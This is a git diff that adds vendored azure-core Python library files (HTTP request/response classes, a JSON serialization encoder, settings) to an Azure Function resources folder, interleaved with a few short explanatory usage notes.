copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. 
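# ---------------------------------------------------------------------------
# Editor's note (illustrative sketch, not part of the vendored diff): the
# _ItemsView override above makes membership tests on response headers
# return False for malformed probes (where requests would raise) and
# compare header names case-insensitively. The same check in isolation
# (items_contains is a hypothetical name):
def items_contains(items, probe):
    if not (isinstance(probe, (list, tuple)) and len(probe) == 2):
        return False  # malformed probe: report absence instead of raising
    return any(probe[0].lower() == k.lower() and probe[1] == v
               for k, v in items)

assert items_contains([("Content-Type", "text/plain")],
                      ("content-type", "text/plain"))
assert not items_contains([("Content-Type", "text/plain")], "content-type")
# ---------------------------------------------------------------------------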
+# +# -------------------------------------------------------------------------- +import trio +from ._http_response_impl_async import AsyncHttpResponseImpl +from ._requests_basic import _RestRequestsTransportResponseBase +from ..pipeline.transport._requests_trio import TrioStreamDownloadGenerator + +class RestTrioRequestsTransportResponse(AsyncHttpResponseImpl, _RestRequestsTransportResponseBase): # type: ignore + """Asynchronous streaming of data from the response. + """ + + def __init__(self, **kwargs): + super().__init__( + stream_download_generator=TrioStreamDownloadGenerator, + **kwargs + ) + + async def close(self) -> None: + if not self.is_closed: + self._is_closed = True + self._internal_response.close() + await trio.sleep(0) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_rest.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_rest.py new file mode 100644 index 0000000..8e1412a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_rest.py @@ -0,0 +1,375 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +import abc +import copy + +from typing import TYPE_CHECKING, MutableMapping + +from ..utils._utils import case_insensitive_dict +from ._helpers import ( + set_content_body, + set_json_body, + set_multipart_body, + set_urlencoded_body, + _format_parameters_helper, + HttpRequestBackcompatMixin, +) +if TYPE_CHECKING: + from typing import ( + Iterable, + Optional, + Any, + Iterator, + Union, + Dict, + ) + ByteStream = Iterable[bytes] + ContentType = Union[str, bytes, ByteStream] + + from ._helpers import ContentTypeBase as ContentType + +try: + ABC = abc.ABC +except AttributeError: # Python 2.7, abc exists, but not ABC + ABC = abc.ABCMeta("ABC", (object,), {"__slots__": ()}) # type: ignore + +################################## CLASSES ###################################### + +class HttpRequest(HttpRequestBackcompatMixin): + """HTTP request. + + It should be passed to your client's `send_request` method. 
+ + >>> from azure.core.rest import HttpRequest + >>> request = HttpRequest('GET', 'http://www.example.com') + + >>> response = client.send_request(request) + + + :param str method: HTTP method (GET, HEAD, etc.) + :param str url: The url for your request + :keyword mapping params: Query parameters to be mapped into your URL. Your input + should be a mapping of query name to query value(s). + :keyword mapping headers: HTTP headers you want in your request. Your input should + be a mapping of header name to header value. + :keyword any json: A JSON serializable object. We handle JSON-serialization for your + object, so use this for more complicated data structures than `data`. + :keyword content: Content you want in your request body. Think of it as the kwarg you should input + if your data doesn't fit into `json`, `data`, or `files`. Accepts a bytes type, or a generator + that yields bytes. + :paramtype content: str or bytes or iterable[bytes] + :keyword dict data: Form data you want in your request body. Use for form-encoded data, i.e. + HTML forms. + :keyword mapping files: Files you want to in your request body. Use for uploading files with + multipart encoding. Your input should be a mapping of file name to file content. + Use the `data` kwarg in addition if you want to include non-file data files as part of your request. + :ivar str url: The URL this request is against. + :ivar str method: The method type of this request. + :ivar mapping headers: The HTTP headers you passed in to your request + :ivar bytes content: The content passed in for the request + """ + + def __init__(self, method, url, **kwargs): + # type: (str, str, Any) -> None + + self.url = url + self.method = method + + params = kwargs.pop("params", None) + if params: + _format_parameters_helper(self, params) + self._files = None + self._data = None + + default_headers = self._set_body( + content=kwargs.pop("content", None), + data=kwargs.pop("data", None), + files=kwargs.pop("files", None), + json=kwargs.pop("json", None), + ) + self.headers = case_insensitive_dict(default_headers) + self.headers.update(kwargs.pop("headers", {})) + + if kwargs: + raise TypeError( + "You have passed in kwargs '{}' that are not valid kwargs.".format( + "', '".join(list(kwargs.keys())) + ) + ) + + def _set_body(self, **kwargs): + # type: (Any) -> MutableMapping[str, str] + """Sets the body of the request, and returns the default headers + """ + content = kwargs.pop("content", None) + data = kwargs.pop("data", None) + files = kwargs.pop("files", None) + json = kwargs.pop("json", None) + default_headers: MutableMapping[str, str] = {} + if data is not None and not isinstance(data, dict): + # should we warn? + content = data + if content is not None: + default_headers, self._data = set_content_body(content) + return default_headers + if json is not None: + default_headers, self._data = set_json_body(json) + return default_headers + if files: + default_headers, self._files = set_multipart_body(files) + if data: + default_headers, self._data = set_urlencoded_body(data, bool(files)) + return default_headers + + def _update_headers(self, default_headers): + # type: (Dict[str, str]) -> None + for name, value in default_headers.items(): + if name == "Transfer-Encoding" and "Content-Length" in self.headers: + continue + self.headers.setdefault(name, value) + + @property + def content(self): + # type: (...) 
+        """Gets the request's content.
+
+        :return: The request's content
+        :rtype: any
+        """
+        return self._data or self._files
+
+    def __repr__(self):
+        # type: (...) -> str
+        return "<HttpRequest [{}], url: '{}'>".format(
+            self.method, self.url
+        )
+
+    def __deepcopy__(self, memo=None):
+        try:
+            request = HttpRequest(
+                method=self.method,
+                url=self.url,
+                headers=self.headers,
+            )
+            request._data = copy.deepcopy(self._data, memo)
+            request._files = copy.deepcopy(self._files, memo)
+            self._add_backcompat_properties(request, memo)
+            return request
+        except (ValueError, TypeError):
+            return copy.copy(self)
+
+class _HttpResponseBase(ABC):
+
+    @property
+    @abc.abstractmethod
+    def request(self):
+        # type: (...) -> HttpRequest
+        """The request that resulted in this response.
+
+        :rtype: ~azure.core.rest.HttpRequest
+        """
+
+    @property
+    @abc.abstractmethod
+    def status_code(self):
+        # type: (...) -> int
+        """The status code of this response.
+
+        :rtype: int
+        """
+
+    @property
+    @abc.abstractmethod
+    def headers(self):
+        # type: (...) -> Optional[MutableMapping[str, str]]
+        """The response headers. Must be case-insensitive.
+
+        :rtype: MutableMapping[str, str]
+        """
+
+    @property
+    @abc.abstractmethod
+    def reason(self):
+        # type: (...) -> str
+        """The reason phrase for this response.
+
+        :rtype: str
+        """
+
+    @property
+    @abc.abstractmethod
+    def content_type(self):
+        # type: (...) -> Optional[str]
+        """The content type of the response.
+
+        :rtype: str
+        """
+
+    @property
+    @abc.abstractmethod
+    def is_closed(self):
+        # type: (...) -> bool
+        """Whether the network connection has been closed yet.
+
+        :rtype: bool
+        """
+
+    @property
+    @abc.abstractmethod
+    def is_stream_consumed(self):
+        # type: (...) -> bool
+        """Whether the stream has been consumed.
+
+        :rtype: bool
+        """
+
+    @property
+    @abc.abstractmethod
+    def encoding(self):
+        # type: (...) -> Optional[str]
+        """Returns the response encoding.
+
+        :return: The response encoding. We either return the encoding set by the user,
+         or try extracting the encoding from the response's content type. If all fails,
+         we return `None`.
+        :rtype: optional[str]
+        """
+
+    @encoding.setter
+    def encoding(self, value):
+        # type: (str) -> None
+        """Sets the response encoding.
+
+        :rtype: None
+        """
+
+    @property
+    @abc.abstractmethod
+    def url(self):
+        # type: (...) -> str
+        """The URL that resulted in this response.
+
+        :rtype: str
+        """
+
+    @abc.abstractmethod
+    def text(self, encoding=None):
+        # type: (Optional[str]) -> str
+        """Returns the response body as a string.
+
+        :param optional[str] encoding: The encoding you want to decode the text with. Can
+         also be set independently through our encoding property
+        :return: The response's content decoded as a string.
+        :rtype: str
+        """
+
+    @abc.abstractmethod
+    def json(self):
+        # type: (...) -> Any
+        """Returns the whole body as a json object.
+
+        :return: The JSON deserialized response body
+        :rtype: any
+        :raises json.decoder.JSONDecodeError or ValueError (in python 2.7) if object is not JSON decodable:
+        """
+
+    @abc.abstractmethod
+    def raise_for_status(self):
+        # type: (...) -> None
+        """Raises an HttpResponseError if the response has an error status code.
+
+        If response is good, does nothing.
+
+        :rtype: None
+        :raises ~azure.core.HttpResponseError if the object has an error status code.:
+        """
+
+    @property
+    @abc.abstractmethod
+    def content(self):
+        # type: (...) -> bytes
+        """Return the response's content in bytes.
+
+        :rtype: bytes
+        """
+
+
+class HttpResponse(_HttpResponseBase):
+    """Abstract base class for HTTP responses.
+
+    Use this abstract base class to create your own transport responses.
+
+    Responses implementing this ABC are returned from your client's `send_request` method
+    if you pass in an :class:`~azure.core.rest.HttpRequest`
+
+    >>> from azure.core.rest import HttpRequest
+    >>> request = HttpRequest('GET', 'http://www.example.com')
+    <HttpRequest [GET], url: 'http://www.example.com'>
+    >>> response = client.send_request(request)
+    <HttpResponse: 200 OK>
+
+    """
+
+    @abc.abstractmethod
+    def __enter__(self):
+        # type: (...) -> HttpResponse
+        """Enter this response"""
+
+    @abc.abstractmethod
+    def close(self):
+        # type: (...) -> None
+        """Close this response"""
+
+    @abc.abstractmethod
+    def __exit__(self, *args):
+        # type: (...) -> None
+        """Exit this response"""
+
+    @abc.abstractmethod
+    def read(self):
+        # type: (...) -> bytes
+        """Read the response's bytes.
+
+        :return: The read in bytes
+        :rtype: bytes
+        """
+
+    @abc.abstractmethod
+    def iter_raw(self, **kwargs):
+        # type: (Any) -> Iterator[bytes]
+        """Iterates over the response's bytes. Will not decompress in the process.
+
+        :return: An iterator of bytes from the response
+        :rtype: Iterator[bytes]
+        """
+
+    @abc.abstractmethod
+    def iter_bytes(self, **kwargs):
+        # type: (Any) -> Iterator[bytes]
+        """Iterates over the response's bytes. Will decompress in the process.
+
+        :return: An iterator of bytes from the response
+        :rtype: Iterator[bytes]
+        """
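A minimal usage sketch of the request shapes the class above accepts. The `client` object is hypothetical; any azure-core based client exposing `send_request` would do.

.. code-block:: python

    from azure.core.rest import HttpRequest

    # JSON body: serialized for you, with a JSON content type as the default header
    request = HttpRequest("POST", "https://example.com/items", json={"name": "goat"})

    # Raw content: str, bytes, or an iterable of bytes, sent as-is
    request = HttpRequest("PUT", "https://example.com/blob", content=b"\x00\x01")

    # Form data: a dict under `data` is urlencoded; add `files` for multipart
    request = HttpRequest("POST", "https://example.com/upload",
                          data={"key": "value"}, files={"file": b"contents"})

    response = client.send_request(request)  # hypothetical client
    response.raise_for_status()
    print(response.json())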
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_rest_py3.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_rest_py3.py
new file mode 100644
index 0000000..18ab229
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_rest_py3.py
@@ -0,0 +1,429 @@
+# --------------------------------------------------------------------------
+#
+# Copyright (c) Microsoft Corporation. All rights reserved.
+#
+# The MIT License (MIT)
+#
+# Permission is hereby granted, free of charge, to any person obtaining a copy
+# of this software and associated documentation files (the "Software"), to
+# deal in the Software without restriction, including without limitation the
+# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
+# sell copies of the Software, and to permit persons to whom the Software is
+# furnished to do so, subject to the following conditions:
+#
+# The above copyright notice and this permission notice shall be included in
+# all copies or substantial portions of the Software.
+#
+# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
+# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
+# IN THE SOFTWARE.
+#
+# --------------------------------------------------------------------------
+import abc
+import copy
+from typing import (
+    Any,
+    AsyncIterable,
+    AsyncIterator,
+    Iterable, Iterator,
+    Optional,
+    Union,
+    MutableMapping,
+)
+
+from ..utils._utils import case_insensitive_dict
+
+from ._helpers import (
+    ParamsType,
+    FilesType,
+    set_json_body,
+    set_multipart_body,
+    set_urlencoded_body,
+    _format_parameters_helper,
+    HttpRequestBackcompatMixin,
+    set_content_body,
+)
+
+ContentType = Union[str, bytes, Iterable[bytes], AsyncIterable[bytes]]
+
+################################## CLASSES ######################################
+
+class HttpRequest(HttpRequestBackcompatMixin):
+    """An HTTP request.
+
+    It should be passed to your client's `send_request` method.
+
+    >>> from azure.core.rest import HttpRequest
+    >>> request = HttpRequest('GET', 'http://www.example.com')
+    <HttpRequest [GET], url: 'http://www.example.com'>
+    >>> response = client.send_request(request)
+    <HttpResponse: 200 OK>
+
+    :param str method: HTTP method (GET, HEAD, etc.)
+    :param str url: The url for your request
+    :keyword mapping params: Query parameters to be mapped into your URL. Your input
+     should be a mapping of query name to query value(s).
+    :keyword mapping headers: HTTP headers you want in your request. Your input should
+     be a mapping of header name to header value.
+    :keyword any json: A JSON serializable object. We handle JSON-serialization for your
+     object, so use this for more complicated data structures than `data`.
+    :keyword content: Content you want in your request body. Think of it as the kwarg you should input
+     if your data doesn't fit into `json`, `data`, or `files`. Accepts a bytes type, or a generator
+     that yields bytes.
+    :paramtype content: str or bytes or iterable[bytes] or asynciterable[bytes]
+    :keyword dict data: Form data you want in your request body. Use for form-encoded data, i.e.
+     HTML forms.
+    :keyword mapping files: Files you want in your request body. Use for uploading files with
+     multipart encoding. Your input should be a mapping of file name to file content.
+     Use the `data` kwarg in addition if you want to include non-file data as part of your request.
+    :ivar str url: The URL this request is against.
+    :ivar str method: The method type of this request.
+    :ivar mapping headers: The HTTP headers you passed in to your request
+    :ivar any content: The content passed in for the request
+    """
+
+    def __init__(
+        self,
+        method: str,
+        url: str,
+        *,
+        params: Optional[ParamsType] = None,
+        headers: Optional[MutableMapping[str, str]] = None,
+        json: Any = None,
+        content: Optional[ContentType] = None,
+        data: Optional[dict] = None,
+        files: Optional[FilesType] = None,
+        **kwargs
+    ):
+        self.url = url
+        self.method = method
+
+        if params:
+            _format_parameters_helper(self, params)
+        self._files = None
+        self._data = None  # type: Any
+
+        default_headers = self._set_body(
+            content=content,
+            data=data,
+            files=files,
+            json=json,
+        )
+        self.headers = case_insensitive_dict(default_headers)
+        self.headers.update(headers or {})
+
+        if kwargs:
+            raise TypeError(
+                "You have passed in kwargs '{}' that are not valid kwargs.".format(
+                    "', '".join(list(kwargs.keys()))
+                )
+            )
+
+    def _set_body(
+        self,
+        content: Optional[ContentType] = None,
+        data: Optional[dict] = None,
+        files: Optional[FilesType] = None,
+        json: Any = None,
+    ) -> MutableMapping[str, str]:
+        """Sets the body of the request, and returns the default headers
+        """
+        default_headers = {}  # type: MutableMapping[str, str]
+        if data is not None and not isinstance(data, dict):
+            # should we warn?
+            content = data
+        if content is not None:
+            default_headers, self._data = set_content_body(content)
+            return default_headers
+        if json is not None:
+            default_headers, self._data = set_json_body(json)
+            return default_headers
+        if files:
+            default_headers, self._files = set_multipart_body(files)
+        if data:
+            default_headers, self._data = set_urlencoded_body(data, has_files=bool(files))
+        return default_headers
+
+    @property
+    def content(self) -> Any:
+        """Gets the request's content.
+
+        :return: The request's content
+        :rtype: any
+        """
+        return self._data or self._files
+
+    def __repr__(self) -> str:
+        return "<HttpRequest [{}], url: '{}'>".format(
+            self.method, self.url
+        )
+
+    def __deepcopy__(self, memo=None) -> "HttpRequest":
+        try:
+            request = HttpRequest(
+                method=self.method,
+                url=self.url,
+                headers=self.headers,
+            )
+            request._data = copy.deepcopy(self._data, memo)
+            request._files = copy.deepcopy(self._files, memo)
+            self._add_backcompat_properties(request, memo)
+            return request
+        except (ValueError, TypeError):
+            return copy.copy(self)
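The body precedence implemented by `_set_body` above is worth pinning down: a non-dict `data` is treated as raw content, `content` wins over `json`, and `files` plus a dict `data` combine into one multipart body. A small sketch of that behavior as written:

.. code-block:: python

    from azure.core.rest import HttpRequest

    r1 = HttpRequest("POST", "https://example.com", data=b"raw bytes")  # non-dict data -> raw content
    r2 = HttpRequest("POST", "https://example.com", json={"a": 1})      # JSON-serialized body
    r3 = HttpRequest("POST", "https://example.com",
                     data={"field": "value"}, files={"file": b"bytes"}) # multipart + form fields
    assert r1.content == b"raw bytes"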
+
+class _HttpResponseBase(abc.ABC):
+    """Base abstract class for HttpResponses.
+    """
+
+    @property
+    @abc.abstractmethod
+    def request(self) -> HttpRequest:
+        """The request that resulted in this response.
+
+        :rtype: ~azure.core.rest.HttpRequest
+        """
+        ...
+
+    @property
+    @abc.abstractmethod
+    def status_code(self) -> int:
+        """The status code of this response.
+
+        :rtype: int
+        """
+        ...
+
+    @property
+    @abc.abstractmethod
+    def headers(self) -> MutableMapping[str, str]:
+        """The response headers. Must be case-insensitive.
+
+        :rtype: MutableMapping[str, str]
+        """
+        ...
+
+    @property
+    @abc.abstractmethod
+    def reason(self) -> str:
+        """The reason phrase for this response.
+
+        :rtype: str
+        """
+        ...
+
+    @property
+    @abc.abstractmethod
+    def content_type(self) -> Optional[str]:
+        """The content type of the response.
+
+        :rtype: str
+        """
+        ...
+
+    @property
+    @abc.abstractmethod
+    def is_closed(self) -> bool:
+        """Whether the network connection has been closed yet.
+
+        :rtype: bool
+        """
+        ...
+
+    @property
+    @abc.abstractmethod
+    def is_stream_consumed(self) -> bool:
+        """Whether the stream has been consumed.
+
+        :rtype: bool
+        """
+        ...
+
+    @property
+    @abc.abstractmethod
+    def encoding(self) -> Optional[str]:
+        """Returns the response encoding.
+
+        :return: The response encoding. We either return the encoding set by the user,
+         or try extracting the encoding from the response's content type. If all fails,
+         we return `None`.
+        :rtype: optional[str]
+        """
+        ...
+
+    @encoding.setter
+    def encoding(self, value: Optional[str]) -> None:
+        """Sets the response encoding.
+
+        :rtype: None
+        """
+
+    @property
+    @abc.abstractmethod
+    def url(self) -> str:
+        """The URL that resulted in this response.
+
+        :rtype: str
+        """
+        ...
+
+    @property
+    @abc.abstractmethod
+    def content(self) -> bytes:
+        """Return the response's content in bytes.
+
+        :rtype: bytes
+        """
+        ...
+
+    @abc.abstractmethod
+    def text(self, encoding: Optional[str] = None) -> str:
+        """Returns the response body as a string.
+
+        :param optional[str] encoding: The encoding you want to decode the text with. Can
+         also be set independently through our encoding property
+        :return: The response's content decoded as a string.
+        :rtype: str
+        """
+        ...
+
+    @abc.abstractmethod
+    def json(self) -> Any:
+        """Returns the whole body as a json object.
+
+        :return: The JSON deserialized response body
+        :rtype: any
+        :raises json.decoder.JSONDecodeError or ValueError (in python 2.7) if object is not JSON decodable:
+        """
+        ...
+
+    @abc.abstractmethod
+    def raise_for_status(self) -> None:
+        """Raises an HttpResponseError if the response has an error status code.
+
+        If response is good, does nothing.
+
+        :rtype: None
+        :raises ~azure.core.HttpResponseError if the object has an error status code.:
+        """
+        ...
+
+class HttpResponse(_HttpResponseBase):
+    """Abstract base class for HTTP responses.
+
+    Use this abstract base class to create your own transport responses.
+
+    Responses implementing this ABC are returned from your client's `send_request` method
+    if you pass in an :class:`~azure.core.rest.HttpRequest`
+
+    >>> from azure.core.rest import HttpRequest
+    >>> request = HttpRequest('GET', 'http://www.example.com')
+    <HttpRequest [GET], url: 'http://www.example.com'>
+    >>> response = client.send_request(request)
+    <HttpResponse: 200 OK>
+
+    """
+
+    @abc.abstractmethod
+    def __enter__(self) -> "HttpResponse":
+        ...
+
+    @abc.abstractmethod
+    def __exit__(self, *args) -> None:
+        ...
+
+    @abc.abstractmethod
+    def close(self) -> None:
+        ...
+
+    @abc.abstractmethod
+    def read(self) -> bytes:
+        """Read the response's bytes.
+
+        :return: The read in bytes
+        :rtype: bytes
+        """
+        ...
+
+    @abc.abstractmethod
+    def iter_raw(self, **kwargs: Any) -> Iterator[bytes]:
+        """Iterates over the response's bytes. Will not decompress in the process.
+
+        :return: An iterator of bytes from the response
+        :rtype: Iterator[bytes]
+        """
+        ...
+
+    @abc.abstractmethod
+    def iter_bytes(self, **kwargs: Any) -> Iterator[bytes]:
+        """Iterates over the response's bytes. Will decompress in the process.
+
+        :return: An iterator of bytes from the response
+        :rtype: Iterator[bytes]
+        """
+        ...
+
+    def __repr__(self) -> str:
+        content_type_str = (
+            ", Content-Type: {}".format(self.content_type) if self.content_type else ""
+        )
+        return "<HttpResponse: {} {}{}>".format(
+            self.status_code, self.reason, content_type_str
+        )
+
+class AsyncHttpResponse(_HttpResponseBase):
+    """Abstract base class for Async HTTP responses.
+
+    Use this abstract base class to create your own transport responses.
+ + Responses implementing this ABC are returned from your async client's `send_request` + method if you pass in an :class:`~azure.core.rest.HttpRequest` + + >>> from azure.core.rest import HttpRequest + >>> request = HttpRequest('GET', 'http://www.example.com') + + >>> response = await client.send_request(request) + + """ + + @abc.abstractmethod + async def read(self) -> bytes: + """Read the response's bytes into memory. + + :return: The response's bytes + :rtype: bytes + """ + ... + + @abc.abstractmethod + async def iter_raw(self, **kwargs: Any) -> AsyncIterator[bytes]: + """Asynchronously iterates over the response's bytes. Will not decompress in the process. + + :return: An async iterator of bytes from the response + :rtype: AsyncIterator[bytes] + """ + raise NotImplementedError() + # getting around mypy behavior, see https://github.com/python/mypy/issues/10732 + yield # pylint: disable=unreachable + + @abc.abstractmethod + async def iter_bytes(self, **kwargs: Any) -> AsyncIterator[bytes]: + """Asynchronously iterates over the response's bytes. Will decompress in the process. + + :return: An async iterator of bytes from the response + :rtype: AsyncIterator[bytes] + """ + raise NotImplementedError() + # getting around mypy behavior, see https://github.com/python/mypy/issues/10732 + yield # pylint: disable=unreachable + + @abc.abstractmethod + async def close(self) -> None: + ... + + @abc.abstractmethod + async def __aexit__(self, *args) -> None: + ... diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/serialization.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/serialization.py new file mode 100644 index 0000000..05fe221 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/serialization.py @@ -0,0 +1,125 @@ +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- +import base64 +from json import JSONEncoder +from typing import Union, cast +from datetime import datetime, date, time, timedelta +from .utils._utils import _FixedOffset + + +__all__ = ["NULL", "AzureJSONEncoder"] + + +class _Null(object): + """To create a Falsy object""" + + def __bool__(self): + return False + + __nonzero__ = __bool__ # Python2 compatibility + + +NULL = _Null() +""" +A falsy sentinel object which is supposed to be used to specify attributes +with no data. This gets serialized to `null` on the wire. +""" + + +def _timedelta_as_isostr(td): + # type: (timedelta) -> str + """Converts a datetime.timedelta object into an ISO 8601 formatted string, e.g. 
'P4DT12H30M05S'
+
+    Function adapted from the Tin Can Python project: https://github.com/RusticiSoftware/TinCanPython
+    """
+
+    # Split seconds to larger units
+    seconds = td.total_seconds()
+    minutes, seconds = divmod(seconds, 60)
+    hours, minutes = divmod(minutes, 60)
+    days, hours = divmod(hours, 24)
+
+    days, hours, minutes = list(map(int, (days, hours, minutes)))
+    seconds = round(seconds, 6)
+
+    # Build date
+    date_str = ""
+    if days:
+        date_str = "%sD" % days
+
+    # Build time
+    time_str = "T"
+
+    # Hours
+    bigger_exists = date_str or hours
+    if bigger_exists:
+        time_str += "{:02}H".format(hours)
+
+    # Minutes
+    bigger_exists = bigger_exists or minutes
+    if bigger_exists:
+        time_str += "{:02}M".format(minutes)
+
+    # Seconds
+    try:
+        if seconds.is_integer():
+            seconds_string = "{:02}".format(int(seconds))
+        else:
+            # 9 chars long w/ leading 0, 6 digits after decimal
+            seconds_string = "%09.6f" % seconds
+            # Remove trailing zeros
+            seconds_string = seconds_string.rstrip("0")
+    except AttributeError:  # int.is_integer() raises
+        seconds_string = "{:02}".format(seconds)
+
+    time_str += "{}S".format(seconds_string)
+
+    return "P" + date_str + time_str
+
+
+def _datetime_as_isostr(dt):
+    # type: (Union[datetime, date, time, timedelta]) -> str
+    """Converts a datetime.(datetime|date|time|timedelta) object into an ISO 8601 formatted string"""
+    # First try datetime.datetime
+    if hasattr(dt, "year") and hasattr(dt, "hour"):
+        dt = cast(datetime, dt)
+        # astimezone() fails for naive times in Python 2.7, so make sure dt is aware (tzinfo is set)
+        if not dt.tzinfo:
+            iso_formatted = dt.replace(tzinfo=TZ_UTC).isoformat()
+        else:
+            iso_formatted = dt.astimezone(TZ_UTC).isoformat()
+        # Replace the trailing "+00:00" UTC offset with "Z" (RFC 3339: https://www.ietf.org/rfc/rfc3339.txt)
+        return iso_formatted.replace("+00:00", "Z")
+    # Next try datetime.date or datetime.time
+    try:
+        dt = cast(Union[date, time], dt)
+        return dt.isoformat()
+    # Last, try datetime.timedelta
+    except AttributeError:
+        dt = cast(timedelta, dt)
+        return _timedelta_as_isostr(dt)
+
+
+try:
+    from datetime import timezone
+
+    TZ_UTC = timezone.utc  # type: ignore
+except ImportError:
+    TZ_UTC = _FixedOffset(0)  # type: ignore
+
+
+class AzureJSONEncoder(JSONEncoder):
+    """A JSON encoder that's capable of serializing datetime objects and bytes."""
+
+    def default(self, o):  # pylint: disable=too-many-return-statements
+        if isinstance(o, (bytes, bytearray)):
+            return base64.b64encode(o).decode()
+        try:
+            return _datetime_as_isostr(o)
+        except AttributeError:
+            pass
+        return super(AzureJSONEncoder, self).default(o)
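What the encoder above buys you, sketched with values computed from the helpers as written: datetimes, timedeltas and bytes all become JSON-safe strings.

.. code-block:: python

    import json
    from datetime import datetime, timedelta, timezone
    from azure.core.serialization import AzureJSONEncoder

    payload = {
        "when": datetime(2022, 1, 1, tzinfo=timezone.utc),  # -> "2022-01-01T00:00:00Z"
        "window": timedelta(hours=12, minutes=30),          # -> "PT12H30M00S"
        "blob": b"\x00\x01",                                # -> "AAE=" (base64)
    }
    print(json.dumps(payload, cls=AzureJSONEncoder))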
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/settings.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/settings.py
new file mode 100644
index 0000000..f20ae5f
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/settings.py
@@ -0,0 +1,438 @@
+# --------------------------------------------------------------------------
+#
+# Copyright (c) Microsoft Corporation. All rights reserved.
+#
+# The MIT License (MIT)
+#
+# Permission is hereby granted, free of charge, to any person obtaining a copy
+# of this software and associated documentation files (the "Software"), to deal
+# in the Software without restriction, including without limitation the rights
+# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+# copies of the Software, and to permit persons to whom the Software is
+# furnished to do so, subject to the following conditions:
+#
+# The above copyright notice and this permission notice shall be included in
+# all copies or substantial portions of the Software.
+#
+# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
+# THE SOFTWARE.
+#
+# --------------------------------------------------------------------------
+"""Provide access to settings for globally used Azure configuration values.
+"""
+
+from collections import namedtuple
+from enum import Enum
+import logging
+import os
+import sys
+import six
+from azure.core.tracing import AbstractSpan
+
+try:
+    from typing import Type, Optional, Dict, Callable, cast, TYPE_CHECKING
+except ImportError:
+    TYPE_CHECKING = False
+
+if TYPE_CHECKING:
+    from typing import Any, Union
+    try:
+        # pylint:disable=unused-import
+        from azure.core.tracing.ext.opencensus_span import OpenCensusSpan  # pylint:disable=redefined-outer-name
+    except ImportError:
+        pass
+
+__all__ = ("settings", "Settings")
+
+
